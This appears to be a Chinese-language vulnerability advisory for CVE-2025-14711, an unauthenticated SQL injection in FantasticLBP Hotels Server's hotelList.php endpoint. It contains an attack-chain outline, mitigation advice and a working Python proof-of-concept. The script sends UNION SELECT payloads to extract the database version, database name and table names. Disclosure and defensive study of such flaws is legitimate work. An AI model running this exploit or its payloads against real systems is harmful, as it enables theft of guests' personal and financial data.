CVE-2025-14711 FantasticLBP Hotels Server SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-14711

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

FantasticLBP Hotels Server

漏洞概述

CVE-2025-14711是FantasticLBP Hotels Server中存在的一个高危SQL注入漏洞。该漏洞影响服务器版本至提交版本67b44df162fab26df209bd5d5d542875fcbec1d0。漏洞位于/controller/api/hotelList.php文件中的未知代码段，攻击者可通过操控pickedHotelName和type参数实现SQL注入攻击。由于该产品采用滚动发布策略持续交付，漏洞可能在多个版本中存在。攻击者可利用此漏洞在无需认证的情况下远程执行恶意SQL语句，从而窃取数据库中的敏感信息，包括客户个人信息、预订记录、财务数据等。漏洞发现者已将此问题报告给厂商，但截至披露时厂商未作出任何回应，表明该漏洞可能长期处于未修复状态，对使用该系统的酒店企业构成严重安全威胁。CVSS 3.1评分7.3属于高危级别，机密性、完整性和可用性均受到低至中等程度影响。

技术细节

FantasticLBP Hotels Server的/controller/api/hotelList.php接口在处理用户请求时存在SQL注入漏洞。漏洞产生的根本原因是程序在构建SQL查询语句时，直接将用户可控的输入参数pickedHotelName和type拼接到SQL语句中，而未进行充分的输入验证或使用参数化查询。当攻击者构造包含SQL元字符（如单引号、分号、UNION SELECT等）的恶意请求时，这些字符会改变原始SQL语句的结构和执行逻辑。例如，攻击者可通过在pickedHotelName参数中注入' OR '1'='1等条件语句绕过认证检查，或使用UNION语句获取其他表的数据。由于该接口无需认证即可访问，攻击者可以在任何网络位置发起攻击。成功利用此漏洞后，攻击者可以枚举数据库结构、读取敏感数据、修改数据库内容，甚至在某些配置下执行操作系统命令。漏洞影响的是酒店管理系统中处理酒店列表查询的核心功能，攻击面广泛且利用难度低。

攻击链分析

STEP 1

步骤1

信息收集阶段：攻击者首先对目标服务器进行端口扫描和指纹识别，确认FantasticLBP Hotels Server服务运行状态，并定位/controller/api/hotelList.php接口

STEP 2

步骤2

漏洞探测阶段：攻击者构造包含SQL特殊字符（如单引号、反斜杠）的探测请求，观察服务器响应以判断是否存在SQL注入漏洞

STEP 3

步骤3

注入点确认：通过输入如' OR '1'='1等条件语句，确认pickedHotelName和type参数存在SQL注入，并判断后端数据库类型（MySQL/MSSQL等）

STEP 4

步骤4

数据提取阶段：利用UNION注入或布尔盲注技术，逐步提取数据库结构信息，包括表名、列名、用户数据等敏感信息

STEP 5

步骤5

权限提升与持久化：根据数据库配置情况，攻击者可能尝试读取操作系统文件、执行系统命令或植入后门程序以维持持久化访问

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-14711 SQL Injection PoC
# Target: FantasticLBP Hotels Server
# Vulnerability: SQL Injection in /controller/api/hotelList.php

def exploit_sqli(target_url, payload):
    """
    Exploit SQL injection vulnerability in FantasticLBP Hotels Server
    
    Args:
        target_url: Base URL of the target server
        payload: SQL injection payload
    
    Returns:
        Server response or error message
    """
    endpoint = f"{target_url}/controller/api/hotelList.php"
    
    # Prepare malicious parameters
    params = {
        'pickedHotelName': payload,
        'type': payload
    }
    
    try:
        # Send GET request with injected payload
        response = requests.get(endpoint, params=params, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Request failed: {str(e)}"

def main():
    if len(sys.argv) < 2:
        print("Usage: python cve_2025_14711.py <target_url>")
        print("Example: python cve_2025_14711.py http://victim.com")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    
    # Test payload - basic SQL injection test
    # This payload attempts to cause a database error
    test_payload = "'"
    
    print(f"[*] Testing SQL injection on {target}")
    print(f"[*] Endpoint: {target}/controller/api/hotelList.php")
    
    response = exploit_sqli(target, test_payload)
    print(f"[+] Response received (length: {len(response)} bytes)")
    
    # Database enumeration payload - get database version
    enum_payload = "' UNION SELECT NULL,version(),NULL,NULL-- -"
    print(f"\n[*] Enumerating database version...")
    version_info = exploit_sqli(target, enum_payload)
    print(f"[+] Version info: {version_info[:200]}...")
    
    # Extract database name
    dbname_payload = "' UNION SELECT NULL,database(),NULL,NULL-- -"
    print(f"\n[*] Extracting database name...")
    dbname = exploit_sqli(target, dbname_payload)
    print(f"[+] Database name: {dbname[:200]}...")
    
    # Extract user tables
    tables_payload = "' UNION SELECT NULL,group_concat(table_name),NULL,NULL FROM information_schema.tables WHERE table_schema=database()-- -"
    print(f"\n[*] Extracting database tables...")
    tables = exploit_sqli(target, tables_payload)
    print(f"[+] Tables: {tables[:500]}...")

if __name__ == "__main__":
    main()

影响范围

FantasticLBP Hotels Server <= 67b44df162fab26df209bd5d5d542875fcbec1d0

防御指南

临时缓解措施

在厂商未发布正式修复补丁前，建议采取以下临时缓解措施：1）通过Web服务器配置（如Nginx/Apache规则）限制对/controller/api/hotelList.php接口的访问，仅允许受信任IP访问；2）在应用层前端部署输入过滤机制，对SQL特殊字符进行转义或拦截；3）启用数据库审计日志，实时监控异常SQL查询行为；4）考虑暂时禁用hotelList.php功能，待漏洞修复后再恢复使用；5）加强网络层防护，限制外部网络对服务器的直接访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14711
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14711
3 Details https://www.cvedetails.com/cve/CVE-2025-14711/
4 VulDB https://vuldb.com/cve/CVE-2025-14711
5 Link https://github.com/navex2/CVE/issues/1
6 Link https://github.com/navex2/CVE/issues/2
7 Link https://vuldb.com/?ctiid.336428
8 Link https://vuldb.com/?id.336428
9 Link https://vuldb.com/?submit.707083
10 Link https://vuldb.com/?submit.707085